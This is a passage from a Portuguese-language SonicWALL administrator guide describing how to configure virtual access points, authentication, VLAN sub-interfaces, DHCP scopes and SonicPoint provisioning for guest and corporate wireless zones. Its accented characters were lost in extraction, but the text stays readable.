DHCP devem ser definidos com ateno para garantir que o escopo de concesso disponvel
no esteja esgotado.
O escopo DHCP deve ser redimensionado conforme cada interface/sub-interface definida,
para garantir que permanea espao adequado de DHCP para todas as interfaces
subsequentemente definidas. No fazer isso pode causar a criao automtica de escopos
DHCP subsequentes com falha, o que requer a criao manual depois de executar o escopo
de redimensionamento requisitado. O Escopo de Servidor DHCP definido na pgina Rede >
Servidor DHCP.

Perfis de ponto de acesso virtual
Um Perfil de Ponto de acesso Virtual permite que o administrador pr-configure e salve
configuraes de ponto de acesso em um perfil. Perfis de VAP permitem que as configuraes
sejam aplicadas facilmente a novos Pontos de acesso virtuais. Perfis de Pontos de acesso
virtuais so configurados na pgina SonicPoint > Ponto de acesso virtual.
Configuraes do perfil de ponto de acesso virtual

A tabela abaixo lista os parmetros de configurao e as descries de Configuraes do perfil
de ponto de acesso virtual:
Limitao Descrio
Nome Escolha um nome amigvel para este novo perfil VAP. Escolha algo
descritivo e fcil de lembrar, pois voc mais tarde ir aplicar este perfil a
novos VAPs.
Tipo Definir como SonicPoint por padro. Manter esta configurao padro
se estiver usando SonicPoints como VAPs (no momento, o nico tipo de
rdio suportado)
Tipo de autenticao Abaixo est uma lista de tipos de autenticao disponveis com recursos
descritivos e uso para cada um:
WEP
Segurana baixa
Para uso com dispositivos legados mais antigos, PDAs, impressoras
sem fio
WPA
Segurana boa (usa TKIP)
Para uso com os clientes sem fio corporativos confiveis
Autenticao transparente com log-in do Windows
Nenhum software de cliente necessrio na maioria dos casos
WPA2
Segurana ideal (usa AES)
Para uso com os clientes sem fio corporativos confiveis
Autenticao transparente com log-in do Windows
Instalao do software de cliente pode ser necessria em alguns
casos
Suporta o recurso de Roaming Rpido" 802.11i
Nenhuma autenticao de back-end necessria aps o primeiro login
(permite roaming mais rpido)
WPA2-AUTO
Tenta se conectar usando a segurana do WPA2. Se o cliente no
possuir WPA2, a conexo ser padro para WPA.
Criptografia unicast A criptografia unicast ser automaticamente escolhida com base no tipo
de autenticao.
Criptografia multicast A criptografia multicast ser automaticamente escolhida com base no
tipo de autenticao.
Mximo de clientes Escolha o nmero mximo de conexes de cliente simultneas
permitidas para este ponto de acesso virtual.

Configuraes de criptografia WPA-PSK/WPA2-PSK
A chave pr-compartilhada (PSK) est disponvel ao usar WPA ou WPA2. Esta soluo utiliza
uma chave compartilhada.
Limitao Descrio
Cdigo de acesso Os usurios de senha compartilhada digitaro ao se conectar com a
autenticao baseada em PSK.
Intervalo de chaves do O perodo de tempo o qual uma Chave de grupo vlida. O valor padro de
grupo 86.400 segundos. A configurao para baixo de um valor pode causar
problemas de conexo.
Configuraes de criptografia WPA_EAP/WPA2-EAP

O Protocolo de Autenticao Extensvel (EAP) est disponvel ao usar WPA ou WPA2. Esta
soluo utiliza um servidor externo com capacidade para 802.1x/EAP RADIUS para gerao
de chave.
Limitao Descrio
Servidor RADIUS 1 Insira o nome/local do servidor de autenticao RADIUS
Porta do servidor A porta na qual o servidor de autenticao RADIUS se comunica com clientes e
RADIUS 1 outros dispositivos de rede.
Segredo do servidor O cdigo de acesso secreto para o servidor de autenticao RADIUS
RADIUS 1
Servidor RADIUS 2 Insira o nome/local do servidor de autenticao RADIUS de backup.
Porta do servidor A porta na qual o servidor de autenticao RADIUS de backup se comunica
RADIUS 2 com clientes e outros dispositivos de rede.
Segredo do servidor O cdigo de acesso secreto para o servidor de autenticao RADIUS de backup
RADIUS 2
Intervalo de chaves do O perodo de tempo (em segundos) durante o qual imposta a atualizao da
grupo chave de grupo WPA/WPA2.
Configuraes de criptografia WEP Compartilhada/Ambas

A WEP fornecida para uso com os dispositivos herdados que no tm suporte para os
mtodos de criptografia WPA/WPA2 mais recentes. Esta soluo utiliza uma chave
compartilhada.
Limitao Descrio
Chave de criptografia Selecione a chave a ser usada para conexes WEP para este VAP. As chaves
de criptografia WEP so configuradas na pgina SonicPoint > SonicPoints,
em Perfis de provisionamento do SonicPoint.

Pontos de acesso virtuais
O recurso de Configuraes de VAP permite a instalao de configuraes gerais do VAP. A
ID de SSID e VLAN so configuradas por meio das Configuraes VAP. Pontos de acesso
virtuais so configurados na pgina SonicPoint > Ponto de acesso virtual.
Configuraes de VAP gerais
Limitao Descrio
SSID Crie um nome amigvel para seu VAP.
ID de VLAN Ao usar plataformas que oferecem suporte a VLAN, opcionalmente, voc pode
selecionar um ID de VLAN para associar com este VAP. Configuraes para este
VAP sero herdadas do VLAN que voc selecionar.
Habilitar ponto de Habilita este VAP.
acesso virtual
Habilitar eliminao de Suprime transmisses do nome SSID e desativa as respostas para solicitaes de
SSID investigao. Marque esta opo se no quiser que seu SSID seja visto por
clientes sem fio no autorizados.
Configuraes de VAP avanadas

As Configuraes avanadas permitem que o administrador defina as configuraes de
autenticao e criptografia para esta conexo. Escolha um Nome do perfil para herdar as
configuraes de um perfil de usurio criado. Consulte Perfis de ponto de acesso virtual na
pgina 506 para informaes completas de configurao de criptografia e autenticao.

Grupos de ponto de acesso virtual
O recurso de Grupos de ponto de acesso virtual est disponvel em dispositivos SonicWALL
NSA. Permite o agrupamento de vrios objetos VAP simultaneamente para que sejam
aplicados ao seu SonicPoint(s). Grupos de Pontos de acesso virtuais so configurados na
pgina SonicPoint > Ponto de acesso virtual.
Perfil de provisionamento do Sonic Point

Perfis de provisionamento do SonicPoint fornecem um mtodo flexvel e altamente
automatizado de configurao e provisionamento de vrios SonicPoints em uma arquitetura de
Sem fio distribudos. As definies do Perfil do SonicPoint incluem todos os ajustes que podem
ser configurados em um SonicPoint, como configuraes de rdio para rdios de 2,4GHz e
5GHz e canais de operao. Para obter mais informaes, consulte Perfis de provisionamento
do SonicPoint na pgina 456.
Pensando de forma crtica sobre VAPs

Esta seo fornece contedo para ajudar a determinar quais so os seus requisitos VAP e
como aplicar esses requisitos em uma configurao VAP til. Esta seo contm as subsees
seguintes:
Determinando suas necessidades VAP na pgina 509
Uma rede de amostra na pgina 509
Determinando as configuraes de segurana na pgina 510
Planilha de configuraes VAP na pgina 511
Determinando suas necessidades VAP

Ao decidir como configurar seu VAP, comece considerando suas necessidades de
comunicao, especialmente:
Quantas classes de usurios sem fio diferentes preciso oferecer suporte?
Como quero proteger essas classes diferentes de usurios sem fio?
O meu cliente sem fio possui o hardware necessrio e os drivers para oferecer suporte s
configuraes de segurana escolhidas?
Quais recursos de rede meus usurios sem fio precisam para se comunicar?
Algum desses usurios sem fio precisam se comunicar com outros usurios sem fio?
Quais servios de segurana desejo aplicar a cada uma das classes ou usurios sem fio?
Uma rede de amostra

A seguir, uma configurao de rede VAP de amostra, descrevendo quatro VAPs separados:

VAP n 1, Usurios sem fio corporativos Um conjunto de usurios que esto
normalmente no escritrio e para quem deve ser dado acesso total a todos os recursos de
rede, garantindo que a conexo seja autenticada e segura. Esses usurios j pertencem
ao Servio de Diretrio da rede, o Microsoft Active Directory, que fornece uma interface
EAP por meio de IAS Servios de Autenticao de Internet.
VAP n 2, Dispositivos sem fio herdados Uma coleo de dispositivos sem fio mais
antigos, como impressoras, PDAs e dispositivos portteis, que s suportam criptografia
WEP.
VAP n 3, Visitando parceiros Parceiros de negcio, clientes e afiliados que visitam com
frequncia o escritrio e precisam de acesso a um conjunto limitado de recursos da rede
confivel, bem como Internet. Estes usurios no esto localizados nos Servios de
Diretrio da empresa.
VAP n 4, Usurios convidados Visitar clientes aos quais voc deseja fornecer acesso
apenas recursos de rede no confiveis (por exemplo, Internet). Alguns usurios
convidados recebero um nome de usurio e senha simples e temporrios para o acesso.
VAP n 5, Usurios convidados frequentes O mesmo que Usurios convidados, no
entanto, esses usurios tero mais contas de convidados permanentes por meio de um
banco de dados back-end.
Determinando as configuraes de segurana

Ao compreender esses requisitos, voc pode definir as zonas (e interfaces) e VAPs que
fornecero servios sem fio para esses usurios:
Sem fio corp Zona sem fio altamente confivel. Emprega a segurana WPA2-AUTO-
EAP. Imposio de WiFiSec (WPA).
WEP & PSK Zona sem fio de confiana moderada. Consiste em dois pontos de acesso
virtuais e sub-interfaces, uma para dispositivos WEP herdados (por exemplo, impressoras,
dispositivos portteis mais antigos) e outra para clientes visitantes que usaro a segurana
WPA-PSK.
Servios para convidados Usa o banco de dados de usurio do Servios para
convidados interno.
LHM Zona de Sistema de mensagens Lightweight Hotspot habilitada, configurada para
usar o servidor de autenticao back-end LHM externo.

Planilha de configuraes VAP
A planilha abaixo fornece algumas perguntas comuns sobre instalao VAP e solues, junto
com um espao para voc registrar suas prprias configuraes.
frequentes Exemplos Solues

Quantos tipos diferentes Sem fio corporativo, acesso de Planejar o nmero de diferentes VAPs
de usurios precisarei convidado, parceiros visitantes e necessrio. Configurar uma zona e
oferecer suporte? dispositivos sem fio so todos os tipos VLAN para cada VAP necessrio
de usurios comuns que exigem seu
prprios VAP
Suas configuraes:
Quantos usurios cada Um campus corporativo tem 100 O escopo DHCP para a zona de
VAP precisar oferecer funcionrios, todos com recursos sem visitante definido para fornecer pelo
suporte? fio menos 100 endereos
Um campus corporativo muitas vezes O escopo DHCP para a zona de
tem algumas dzias de visitantes visitante definido para fornecer pelo
possveis sem fio menos 25 endereos
Suas configuraes:
Desejo proteger Um usurio corporativo que possui Configurar WPA2-EAP

diferentes usurios sem acesso a recursos da LAN
fio? corporativa.
Um usurio convidado que est Habilitar Servios para convidados mas
restrito apenas ao acesso Internet no definir configuraes de segurana
Uma impressora sem fio herdada na Configurar WEP e ativar a filtragem de
LAN corporativa endereos MAC
Suas configuraes:
Quais recursos de rede Um usurio corporativo que precisa Habilitar a Confiana de interface na
meus usurios precisam de acesso a todos os recursos sua
para se comunicar? internos de LAN, incluindo outros zona corporativa.
usurios WLAN e LAN corporativa.
Um convidado sem fio que precisa Desabilitar a Confiana de interface na
acessar a Internet e no deve poder sua
se comunicar com outros usurios da zona de convidados.
WLAN.
Suas configuraes:

frequentes Exemplos Solues
Quais servios de Usurios corporativos que voc Ativar todos os servios de segurana
segurana desejo aplicar deseja proteger com a sute completa do SonicWALL.
aos meus usurios? de segurana SonicWALL.
Usurios convidados que no Desabilitar todos os servios de
fornecem nada de interessante, uma segurana do SonicWALL.
vez que no esto na sua LAN.
Suas configuraes:
Configuraes de amostra VAP

Esta seo fornece exemplos de configurao com base nas necessidades reais de acesso
sem fio. Esta seo contm as subsees seguintes:
Configurando um VAP para Acesso de convidado na pgina 512
Configurando um VAP para Acesso LAN corporativa na pgina 519
Implantao de VAPs em um SonicPoint na pgina 525
Configurando um VAP para Acesso de convidado

Voc pode usar um VAP de Acesso de convidado para visitar clientes aos quais voc deseja
fornecer acesso apenas recursos de rede no confiveis (por exemplo, Internet). Usurios
convidados recebero um nome de usurio e senha simples e temporrio para o acesso.
Configuraes mais avanadas tambm oferecem contas de convidado mais permanentes,
verificadas por meio de um banco de dados de back-end.
Esta seo contm a subseo seguinte:
Configurando uma zona na pgina 512
Criando uma Interface de LAN sem fio (WLAN) na pgina 515
Criando uma sub-interface VLAN na WLAN na pgina 516
Configurando intervalos de IP do DHCP na pgina 517
Criando o VAP SonicPoint na pgina 518
Configurando uma zona
Nesta seo, voc ir criar e configurar uma nova zona sem fio com recursos de login de
convidado.
Etapa 1 Efetue login na interface de gerenciamento do seu dispositivo SonicWALL UTM.

Etapa 2 No menu esquerda, navegue at a pgina Rede > Zonas.
Etapa 3 Clique no boto Adicionar para adicionar uma nova zona.
Guia de Configuraes gerais
Etapa 1 Na guia Geral, insira um nome amigvel, como "Convidados VAP" no campo Nome.
Etapa 2 Selecionar Sem fio do menu suspenso Tipo de segurana.

Etapa 3 Desmarque a caixa de seleo Permitir confiana de interface para no permitir a
comunicao entre convidados sem fio.
Guia de Configuraes sem fio
Etapa 1 Na guia Sem fio, marque a caixa de seleo Apenas permitir trfego gerado por um
SonicPoint.
Etapa 2 Desmarque todas as outras opes nessa guia.
Etapa 3 Selecione um perfil de provisionamento do menu suspenso Perfil de Provisionamento do
SonicPoint (se aplicvel).

Guia de Servios para convidados
Etapa 1 Na guia Servios para convidados, marque a caixa de seleo Habilitar servios para
convidados.
Nota No exemplo a seguir, as etapas 2 a 7 so opcionais e apenas representam uma

configurao de convidado VAP tpica usando servios de convidados. As etapas 2 e 7, no
entanto, so recomendadas.
Etapa 2 Marque a caixa de seleo Habilitar Converso Dinmica de Endereos (DAT) para permitir
que usurios convidados se comuniquem totalmente com endereos fora da rede local.
Etapa 3 Marque a caixa de seleo Pgina de Autenticao personalizada e clique no boto
Configurar para configurar um cabealho personalizado e rodap para a de pgina de login
de convidado.

Etapa 5 Marque a caixa de seleo Pgina de Ps-autenticao e insira um URL para redirecionar os
convidados sem fio aps o login.
Etapa 6 Marque a caixa de seleo Aprovar redes para configurar um site da Web (como seu site
corporativo) que voc deseja permitir o acesso sem efetuar login no servios de convidados.

Etapa 7 Insira o nmero mximo de convidados que este VAP dar suporte no campo Convidados
mx.

Sua nova zona agora aparece na parte inferior da pgina Rede > Zonas, embora voc possa
observar que ainda no est vinculada a uma Interface de membro. Esta a sua prxima
etapa.
Criando uma Interface de LAN sem fio (WLAN)
Nesta seo, voc ir configurar uma das portas para agir como uma WLAN. Se j possui uma
WLAN configurada, avance para Criando uma Interface de LAN sem fio (WLAN) na
pgina 515.
Etapa 1 Na pgina Rede > Interfaces, clique no cone Configurar correspondente interface que
deseja usar como uma WLAN. A tela Configuraes de interface ser exibida.
Etapa 2 Selecione WLAN na lista suspensa Zona.
Etapa 3 Digite o Endereo IP desejado para esta interface.

Etapa 4 No menu suspenso Limite de SonicPoint, selecione um limite para o nmero de SonicPoints.
Isso define o nmero total de SonicPoints que a sua interface WLAN fornecer suporte.
Nota O nmero mximo de SonicPoints depende da sua plataforma. Consulte o Configuraes

VLAN personalizadas na pgina 505 para visualizar o nmero mximo de SonicPoints para
a sua plataforma.
Etapa 5 Clique no boto OK para salvar as alteraes nesta interface.

A interface WLAN agora exibida na lista de Configuraes de interface.
Criando uma sub-interface VLAN na WLAN
Nesta seo, voc ir criar e configurar uma nova sub-interface VLAN no seu WLAN atual. Este
VLAN ser vinculado zona criada em Configurando uma zona na pgina 512.
Etapa 1 Na pgina Rede > Interfaces, clique no boto Adicionar interface .

Etapa 2 No menu suspenso Zona, selecione a zona criada no Configurando uma zona na pgina 512.
Nesse caso, escolhemos VAP-convidado.
Etapa 3 Insira uma Marca VLAN para esta interface. Este nmero permite que o SonicPoint identifique
o trfego que pertence VLAN "VAP-convidado". Voc deve escolher um nmero com base
em um esquema organizado. Nesse caso, escolhemos 200 como nossa marca da VLAN VAP-
convidado.
Etapa 4 No menu suspenso Interface pai, selecione a interface que seu SonicPoint est conectados
fisicamente. Nesse caso, estamos usando X2, que nossa interface WLAN.
Etapa 5 Digite o Endereo IP desejado para esta sub-interface.
Etapa 6 Selecione um limite para o nmero de SonicPoints no menu suspenso Limite de SonicPoint.
Isso define o nmero total de SonicPoints que o seu VLAN fornecer suporte.

Etapa 7 Como alternativa, voc pode adicionar um comentrio sobre esta sub-interface no campo
Comentrio.
Etapa 8 Clique no boto OK para adicionar esta sub-interface.

A sub-interface VLAN agora exibida na lista de Configuraes de interface.
Configurando intervalos de IP do DHCP
Por o nmero de concesses de DHCP disponveis variam de acordo com a plataforma, o

escopo DHCP deve ser redimensionado conforme cada interface/sub-interface definida para
garantir que permanea espao adequado de DHCP para todas as interfaces
subsequentemente definidas. Para exibir o nmero mximo de concesses DHCP para seu
dispositivo de segurana SonicWALL, consulte o Configuraes do servidor DHCP na
pgina 505.
Etapa 1 No menu esquerda, navegue at a pgina Rede > Servidor DHCP.

Etapa 2 Localize a interface que voc acabou de criar, no nosso caso, o X2:V200 (interface virtual de
200 na interface X2 fsica). Clique no cone Configurar correspondente interface que
deseja.
Nota Se a interface que voc criou no aparecer na pgina Rede > Servidor DHCP, possvel
que voc j tenha excedido o nmero de concesses DHCP permitidos para o seu firewall.
Para obter mais informaes sobre exausto de concesso do DHCP, consulte
Configuraes do servidor DHCP na pgina 505.

Etapa 3 Edite os campos Incio do intervalo e Fim do intervalo para atender s necessidades de
implantao

O novo escopo de concesso DHCP agora aparece na lista de Escopos de concesso de
servidor DHCP.
Criando um Perfil VAP no SonicPoint
Nesta seo, voc ir criar e configurar um novo Perfil de Ponto de acesso virtual. Voc pode
criar Perfis VAP para cada tipo de VAP e us-los facilmente aplicando configuraes
avanadas a novos VAPs. Esta seo opcional, mas facilitar o uso durante a configurao
de vrios VAPs.
Etapa 1 No menu esquerda, navegue para a pgina SonicPoint > Ponto de acesso virtual.
Etapa 2 Clique no boto Adicionar... na seo Perfis de ponto de acesso virtual.
Etapa 3 Insira um Nome do perfil como Convidado para este Perfil VAP.
Etapa 4 Escolha um Tipo de autenticao. Para acesso de convidado no segura, escolhemos
"Aberto".
Etapa 5 Clique no boto OK para criar este Perfil VAP.
Criando o VAP SonicPoint
Nesta seo, voc ir criar e configurar um novo Ponto de acesso virtual e associ-lo ao VLAN
que voc criou no Criando uma sub-interface VLAN na WLAN na pgina 516.

Etapa 2 Clique no boto Adicionar... na seo Pontos de acesso virtual.
Etapa 3 Insira um nome padro (SSID) para o VAP. Nesse caso, escolhemos VAP-convidado, o
mesmo nome que a zona para a qual ser associado.
Etapa 4 Selecione o ID de VLAN que voc criou na Sub-interfaces de VLAN na pgina 504 na lista
suspensa. Nesse caso, escolhemos 200, a ID de VLAN do VLAN VAP-convidado.
Etapa 5 Marque a caixa de seleo Habilitar ponto de acesso virtual para habilitar este ponto de
acesso durante a criao.
Etapa 6 Clique na guia Avanado para editar as configuraes de criptografia. Se voc criou um Perfil
VAP na seo anterior, selecione o perfil na lista Nome do perfil. Criamos e escolhemos um
perfil de "Convidado", que usa abrir como o mtodo de autenticao.
Etapa 7 Clique no boto OK para adicionar este VAP. Seu novo VAP agora aparece na lista de Pontos
de acesso virtuais.
Agora que voc definiu com xito a configurao do Convidado, voc pode escolher adicionar
mais VAPs personalizados ou implantar essa configurao em seu SonicPoint no Implantao
de VAPs em um SonicPoint na pgina 525.
Dica Lembre-se de que mais VAPs sempre podem ser adicionados mais tarde. Novos VAPs
podem ser implantados simultaneamente em todos os SonicPoints seguindo as etapas em
Implantao de VAPs em um SonicPoint na pgina 525.
Configurando um VAP para Acesso LAN corporativa

Voc pode usar um VAP LAN corporativo para um conjunto de usurios que esto normalmente
no escritrio e para quem deve ser dado acesso total a todos os recursos de rede, garantindo
que a conexo seja autenticada e segura. Esses usurios j pertenceriam ao Servio de
Diretrio da rede, o Microsoft Active Directory, que fornece uma interface EAP por meio de IAS
Servios de Autenticao de Internet. Esta seo contm a subseo seguinte:
Configurando uma zona na pgina 520
Criando uma sub-interface VLAN na WLAN na pgina 521
Configurando intervalos de IP do DHCP na pgina 522
Criando o VAP SonicPoint na pgina 523

Configurando uma zona
Nesta seo, voc ir criar e configurar uma nova zona sem fio corporativa com servios de
segurana SonicWALL UTM e segurana sem fio aprimorada WiFiSec/WPA2.
Etapa 1 Efetue login na interface de gerenciamento do seu dispositivo SonicWALL UTM.

Etapa 2 No menu esquerda, navegue at a pgina Rede > Zonas.
Etapa 3 Clique no boto Adicionar para adicionar uma nova zona.
Guia de Configuraes gerais
Etapa 1 Na guia Geral, insira um nome amigvel, como VAP-Corporativo" no campo Nome.
Etapa 2 Selecionar Sem fio do menu suspenso Tipo de segurana.
Etapa 3 Selecione a caixa de seleo Permitir confiana de interface para permitir a comunicao
entre usurios sem fio corporativos.
Etapa 4 Selecione as caixas de seleo para todos os servios de segurana que voc normalmente
aplicaria aos usurios da LAN corporativos com fio.

Guia de Configuraes sem fio
Etapa 1 Na guia Sem fio, marque a caixa de seleo Apenas permitir trfego gerado por um
SonicPoint.
Etapa 2 Selecione a caixa de seleo Imposio de WiFiSec para ativar a segurana WiFiSec nesta
conexo.
Etapa 3 Selecionar Confiar no trfego WPA/WPA2 como WiFiSec para ativar acesso de usurio
WPA/WPA2 a esta conexo.
Etapa 4 Selecione um perfil de provisionamento do menu suspenso Perfil de Provisionamento do
SonicPoint (se aplicvel).

Sua nova zona agora aparece na parte inferior da pgina Rede > Zonas, embora voc possa
observar que ainda no est vinculada a uma Interface de membro. Esta a sua prxima
etapa.
Criando uma sub-interface VLAN na WLAN
Nesta seo, voc ir criar e configurar uma nova sub-interface VLAN no seu WLAN atual. Este
VLAN ser vinculado zona criada em Configurando uma zona na pgina 520.

Etapa 1 Na pgina Rede > Interfaces, clique no boto Adicionar interface.
Etapa 2 No menu suspenso Zona, selecione a zona criada no Configurando uma zona na pgina 520.
Nesse caso, escolhemos VAP-Corporativo.
Etapa 3 Insira uma Marca VLAN para esta interface. Este nmero permite que o SonicPoint identifique
o trfego que pertence VLAN VAP-corporate". Voc deve escolher um nmero com base em
um esquema organizado. Nesse caso, escolhemos 50 como nossa marca da VLAN VAP-
Corporativo.
Etapa 4 No menu suspenso Interface pai, selecione a interface que seu SonicPoint est conectados
fisicamente. Nesse caso, estamos usando X2, que nossa interface WLAN.
Etapa 5 Digite o Endereo IP desejado para esta sub-interface.
Etapa 6 No menu suspenso Limite de SonicPoint, selecione um limite para o nmero de SonicPoints.
Isso define o nmero total de SonicPoints que a sua interface WLAN fornecer suporte.
Etapa 7 Como alternativa, voc pode adicionar um comentrio sobre esta sub-interface no campo
Comentrio.
Etapa 8 Clique no boto OK para adicionar esta sub-interface.
A sub-interface VLAN agora exibida na lista de Configuraes de interface.
Configurando intervalos de IP do DHCP
Por o nmero de concesses de DHCP disponveis variam de acordo com a plataforma, o

escopo DHCP deve ser redimensionado conforme cada interface/sub-interface definida para
garantir que permanea espao adequado de DHCP para todas as interfaces
subsequentemente definidas. Para exibir o nmero mximo de concesses DHCP para seu
dispositivo de segurana SonicWALL, consulte o Configuraes do servidor DHCP na
pgina 505.
Etapa 1 No menu esquerda, navegue at a pgina Rede > Servidor DHCP.

Etapa 2 Localize a interface que voc acabou de criar, no nosso caso, o X2:V50 (interface virtual de
50 na interface X2 fsica). Clique no cone Configurar correspondente interface que
deseja.

Nota Se a interface que voc criou no aparecer na pgina Rede > Servidor DHCP, possvel
que voc j tenha excedido o nmero de concesses DHCP permitidos para o seu firewall.
Para obter mais informaes sobre exausto de concesso do DHCP, consulte
Configuraes do servidor DHCP na pgina 505.
Etapa 3 Edite os campos Incio do intervalo e Fim do intervalo para atender s necessidades de
implantao
Etapa 4 Clique no boto OK para salvar as alteraes. O novo escopo de concesso DHCP agora
aparece na lista de Escopos de concesso de servidor DHCP.
Criando um Perfil VAP no SonicPoint
Nesta seo, voc ir criar e configurar um novo Perfil de Ponto de acesso virtual. Voc pode
criar Perfis VAP para cada tipo de VAP e us-los facilmente aplicando configuraes
avanadas a novos VAPs. Esta seo opcional, mas facilitar o uso durante a configurao
de vrios VAPs.
Etapa 2 Clique no boto Adicionar... na seo Perfis de ponto de acesso virtual.
Etapa 3 Insira um Nome do perfil como Corporativo-WPA2 para este Perfil VAP.
Etapa 4 Selecionar WPA2-AUTO-EAP do menu suspenso Tipo de autenticao. Isso ser empregar
uma autenticao de usurio automtica com base nas configuraes do servidor RADIUS
atuais (definir abaixo).
Etapa 5 No campo Mximo de clientes, insira o nmero mximo de conexes simultneas que este
VAP dar suporte.
Etapa 6 Na seo Configuraes de criptografia WPA-EAP, insira as atuais informaes do servidor
RADIUS. Essa informao ser usada para oferecer suporte de login autenticado VLAN.
Etapa 7 Clique no boto OK para criar este Perfil VAP.
Criando o VAP SonicPoint

Nesta seo, voc ir criar e configurar um novo Ponto de acesso virtual e associ-lo ao VLAN
que voc criou no Criando uma sub-interface VLAN na WLAN na pgina 521.

Guia Geral
Etapa 2 Clique no boto Adicionar... na seo Pontos de acesso virtual.
Etapa 3 Insira um nome padro (SSID) para o VAP. Nesse caso, escolhemos VAP-convidado, o
mesmo nome que a zona para a qual ser associado.
Etapa 4 Selecione o ID de VLAN que voc criou na Criando uma sub-interface VLAN na WLAN na
pgina 521 na lista suspensa. Nesse caso, escolhemos 50, a ID de VLAN do VLAN VAP-
Corporativo.
Etapa 5 Marque a caixa de seleo Habilitar ponto de acesso virtual para habilitar este ponto de
acesso durante a criao.
Etapa 6 Marque a caixa de seleo Habilitar eliminao de SSID para ocultar este SSID de usurios
Etapa 7 Clique no boto OK para adicionar este VAP.

Seu novo VAP agora aparece na lista de Pontos de acesso virtuais.
Guia Avanado (Configuraes de autenticao)
Etapa 1 Clique na guia Avanado para editar as configuraes de criptografia. Se voc criou um Perfil
VAP na seo anterior, selecione o perfil na lista Nome do perfil. Criamos e escolhemos um
perfil de Corporate-WPA2", que usa WPA2-AUTO-EAP como o mtodo de autenticao. Se
voc no configurou um Perfil VAP, continue com as etapas 2 a 4. Caso contrrio, continue em
Criar mais/Implantar VAPs atuais na pgina 524.
Etapa 2 Na guia Avanado, selecione WPA2-AUTO-EAP no menu suspenso Tipo de autenticao.
Isso ser empregar uma autenticao de usurio automtica com base nas configuraes do
servidor RADIUS atuais (definir abaixo).
Etapa 3 No campo Mximo de clientes, insira o nmero mximo de conexes simultneas que este
VAP dar suporte.
Etapa 4 Na seo Configuraes de criptografia WPA-EAP, insira as atuais informaes do servidor
RADIUS. Essa informao ser usada para oferecer suporte de login autenticado VLAN.
Criar mais/Implantar VAPs atuais

Agora que voc definiu com xito uma VLAN para acesso LAN Corporativa, voc pode
escolher adicionar mais VAPs personalizados ou implantar essa configurao em seu
SonicPoint no Implantao de VAPs em um SonicPoint na pgina 525.

Dica Lembre-se de que mais VAPs sempre podem ser adicionados mais tarde. Novos VAPs
podem ser implantados simultaneamente em todos os SonicPoints seguindo as etapas em
Implantao de VAPs em um SonicPoint na pgina 525.
Implantao de VAPs em um SonicPoint

Na seo a seguir, voc ir agrupar e implantar seu novos VAPs e associ-los a um ou mais
SonicPoint Radios. Os usurios no podero acessar seus VAPs at que voc conclua esse
processo:
Agrupando vrios VAPs na pgina 525
Criando um Perfil de provisionamento do SonicPoint na pgina 525
Agrupando vrios VAPs
Nesta seo, voc ir agrupar vrios VAPs em um nico grupo a associar ao(s) seu(s)
SonicPoint(s).
Etapa 2 Clique no boto Adicionar grupo... na seo Pontos de acesso virtual.
Etapa 3 Insira um Nome do grupo de PA virtual.
Etapa 4 Selecione os VAPs desejados na lista e clique no boto -> para adicion-los ao grupo.
Opcionalmente, clique no boto Adicionar tudo para adicionar todos os VAPs em um nico
grupo.
Etapa 5 Clique no boto OK para salvar as alteraes e criar o grupo.
Criando um Perfil de provisionamento do SonicPoint
Nesta seo, voc ir associar o grupo que voc criou no Agrupando vrios VAPs na
pgina 525 com um SonicPoint ao criar um perfil de provisionamento. Este perfil permitir que
voc fornea configuraes de um grupo de VAPs para todos os seus SonicPoints.

Etapa 1 No menu esquerda, navegue para a pgina SonicPoint > SonicPoints.
Etapa 2 Clique no boto Adicionar na seo Perfis de provisionamento do SonicPoint.
Etapa 3 Clique na caixa de seleo Habilitar SonicPoint para habilitar este perfil.
Etapa 4 No campo Prefixo de nome, insira um nome para este perfil.
Etapa 5 Selecione um Cdigo do pas: na lista suspensa.
Etapa 6 Da lista suspensa Grupo de AP Virtual rdio 802.11, selecione o grupo que voc criou no
Agrupando vrios VAPs na pgina 525.
Etapa 7 Para instalar a criptografia WEP 802.11g ou WEP/WPA 802.11a, ou para ativar a filtragem de
endereos MAC, use as guias 802.11g e 802.11a. Se qualquer um dos seu VAPs usar
criptografia, voc dever definir essas configuraes antes de seu SonicPoint VAPs funcionar.
Etapa 8 Clique no boto OK para salvar as alteraes e criar o Perfil de provisionamento do SonicPoint.
Etapa 9 Clique no boto Sincronizar SonicPoints na parte superior da tela para aplicar seu perfil de
provisionamento aos SonicPoints disponveis.
O SonicPoint pode levar alguns instantes para reinicializar antes de efetivar as alteraes.
Depois que esse processo for concludo, todos os perfis VAP estaro disponveis para os
usurios sem fio por meio deste SonicPoint.
Associando um Grupo VAP ao seu SonicPoint
Se voc no criou um Perfil de provisionamento do SonicPoint, voc pode provisionar seu

SonicPoint manualmente. aconselhvel usar esse mtodo se voc tiver apenas um
SonicPoint para a proviso. Esta seo no necessria se voc tiver criado e provisionado
seu SonicPoints usando um Perfil de SonicPoint.

Etapa 1 No menu esquerda, navegue para a pgina SonicPoint > SonicPoints.
Etapa 2 Clique no boto Configurar prximo ao SonicPoint que deseja associar seu APs Virtual.
Etapa 3 Na seo de Configuraes do ponto de acesso virtual, selecione o grupo VAP criado em
Agrupando vrios VAPs na pgina 525 a partir da lista suspensa Grupo de AP Virtual rdio
802.11g (ou 802.11a). Nesse caso, escolhemos VAP como nosso Grupo de AP Virtual.
Etapa 4 Clique no boto OK para adicionar este Grupo VAP ao seu SonicPoint.
Etapa 5 Clique no boto Sincronizar SonicPoints na parte superior da tela para aplicar seu perfil de
provisionamento aos SonicPoints disponveis.
O SonicPoint pode levar alguns instantes para reinicializar antes de efetivar as alteraes.
Depois que esse processo for concludo, todos os perfis VAP estaro disponveis para os
usurios sem fio por meio deste SonicPoint.
Nota Se voc estiver configurando servios de convidado pela primeira vez, certifique-se de
executar as configuraes necessrias nas pginas Usurios > Servios para
convidados. Para obter mais informaes sobre a configurao dos servios para
convidados, consulte o Guia Avanado do Administrador do SonicOS.

Captulo 37
Configurar monitoramento por RF
Sonic Point > Monitoramento por RF

Esta seo detalha o recurso de Monitoramento por radiofrequncia (RF) e fornece exemplos
de configurao para facilitar a implantao. Esta seo contm as seguintes subsees:
Compreenso do Monitoramento por radiofrequncia na pgina 529
Configurando o recurso de Monitoramento por RF na pgina 535
Compreenso do Monitoramento por radiofrequncia

A seo a seguir fornece uma viso geral do recurso de Monitoramento de RF e contm as
subsees a seguir:
O qu Monitoramento por RF? na pgina 529
Viso geral da Interface de Gerenciamento na pgina 530
O qu Monitoramento por RF?

A tecnologia de radiofrequncia (RF) usada nos dispositivos baseados em rede sem fio 802.11
